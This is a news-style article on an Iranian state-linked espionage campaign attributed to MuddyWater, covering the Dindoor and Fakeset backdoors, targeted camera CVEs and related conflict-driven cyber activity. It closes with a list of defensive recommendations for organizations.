Iranian Cyber Espionage Activity Detected in Multiple U.S. Networks
Security researchers have uncovered evidence that an Iranian state-linked hacking group has infiltrated the networks of several organizations in North America, including banks, airports, and non-profit groups.
The investigation, conducted by security teams at Broadcom’s Symantec and Carbon Black, attributes the activity to the well-known cyber-espionage group MuddyWater, also called Seedworm. The group is believed to operate under Iran’s Ministry of Intelligence and Security (MOIS).
Researchers say the campaign appears to have started in early February, with additional suspicious activity discovered after recent military tensions involving the United States, Israel, and Iran.
Defense Supply Chain May Have Been a Key Target
Among the affected organizations was a software company connected to the defense and aerospace industries. Investigators believe the attackers may have been particularly interested in the company’s Israeli operations, which could have provided access to sensitive technology or strategic information.
Security analysts also observed activity affecting a U.S. financial institution and a Canadian non-profit organization, suggesting that the attackers were exploring multiple entry points across different sectors.
Newly Discovered Backdoor Used in the Attacks
During the investigation, researchers identified a previously unknown backdoor named Dindoor.
This malware uses the Deno JavaScript runtime environment to execute malicious commands on compromised systems. Dindoor appears to give attackers long-term access to targeted networks.
Analysts also found signs that attackers attempted to move stolen data from one of the compromised networks using Rclone, a tool often used for transferring files to cloud storage. The suspected destination was a Wasabi cloud storage bucket, though investigators could not confirm whether any data was successfully exfiltrated.
Python-Based Backdoor Found in Additional Networks
Another malware tool discovered during the investigation is a Python-based backdoor called Fakeset.
This malicious software was downloaded from servers belonging to Backblaze, a cloud storage and backup provider. Interestingly, the digital certificate used to sign Fakeset had previously been linked to other malware families associated with MuddyWater, including Stagecomp and Darkcomp.
Even though these malware strains were not directly observed in the compromised networks, the reuse of the same certificates strongly suggests that the same Iranian threat actor was behind the activity.
Iranian Cyber Capabilities Continue to Evolve
Security experts say Iranian cyber groups have become more advanced over the past several years.
Their operations now often combine:
- Malware deployment
- Social engineering attacks
- Spear-phishing campaigns
- Online relationship manipulation tactics sometimes known as “honeytrap” operations
These techniques help attackers gain access to corporate accounts, sensitive data, or internal networks.
Cyber Attacks Rising Amid Middle East Tensions
The discovery comes during a period of rising geopolitical tensions in the Middle East, where cyber operations are increasingly used alongside traditional military strategies.
Recent investigations have also identified activity from Handala Hack, a pro-Palestinian hacktivist group that reportedly routed cyber operations through Starlink IP ranges while scanning internet-exposed systems for security weaknesses.
Iranian Hackers Target Security Cameras
Other Iran-linked groups have been observed scanning for vulnerabilities in internet-connected security cameras and video intercom systems.
Researchers found attempts to exploit known flaws in devices from manufacturers such as Hikvision and Dahua.
Several vulnerabilities are being targeted, including:
- CVE-2017-7921
- CVE-2023-6895
- CVE-2021-36260
- CVE-2021-33044
- CVE-2025-34067
These attacks have been detected across several regions, including Israel, the Gulf states, Lebanon, and Cyprus.
Security experts believe compromised camera systems could potentially provide real-time intelligence for military operations or help assess the impact of missile strikes.
Global Cyber Activity Linked to the Conflict
Cybersecurity analysts have also reported several other developments connected to the ongoing geopolitical situation.
Some of the notable incidents include:
- Claims that Israeli intelligence monitored Iranian leadership movements by accessing Tehran’s traffic camera network.
- Reports that Iran’s Islamic Revolutionary Guard Corps (IRGC) targeted an Amazon data center in Bahrain.
- Wiper malware campaigns targeting Israeli energy, finance, government, and utility sectors.
- Multiple Iranian APT groups rapidly updating their cyber tools and infrastructure in preparation for potential retaliatory attacks.
In addition, a coordinated cyber campaign known as #OpIsrael has reportedly targeted government systems and industrial control networks in several countries.
Experts Warn of Possible Retaliatory Cyber Attacks
Cybersecurity agencies are warning that geopolitical conflicts can quickly spill into the digital world.
The Canadian Centre for Cyber Security recently issued an advisory suggesting that Iran could use cyber operations to retaliate against Western countries, potentially targeting critical infrastructure or public information systems.
Experts say Iranian cyber strategy often relies on relatively simple but effective techniques such as:
- Password spraying
- Credential theft
- Social engineering attacks
- Abuse of legitimate enterprise services
Rather than relying heavily on zero-day exploits, Iranian groups often focus on gaining persistent access to cloud accounts and identity systems.
How Organizations Can Strengthen Their Defenses
Security specialists recommend that organizations take several steps to reduce their exposure to these types of cyber threats.
Key defensive measures include:
- Strengthening monitoring and threat detection capabilities
- Limiting internet exposure of internal systems
- Disabling unnecessary remote access to operational technology networks
- Implementing phishing-resistant multi-factor authentication
- Segmenting networks to prevent lateral movement
- Maintaining offline backups of critical data
- Keeping VPN gateways and internet-facing systems fully updated
Security experts also warn that cyber activity linked to geopolitical tensions may escalate further in the coming months.
Organizations are encouraged to remain vigilant as cyber operations increasingly become a tool of international conflict.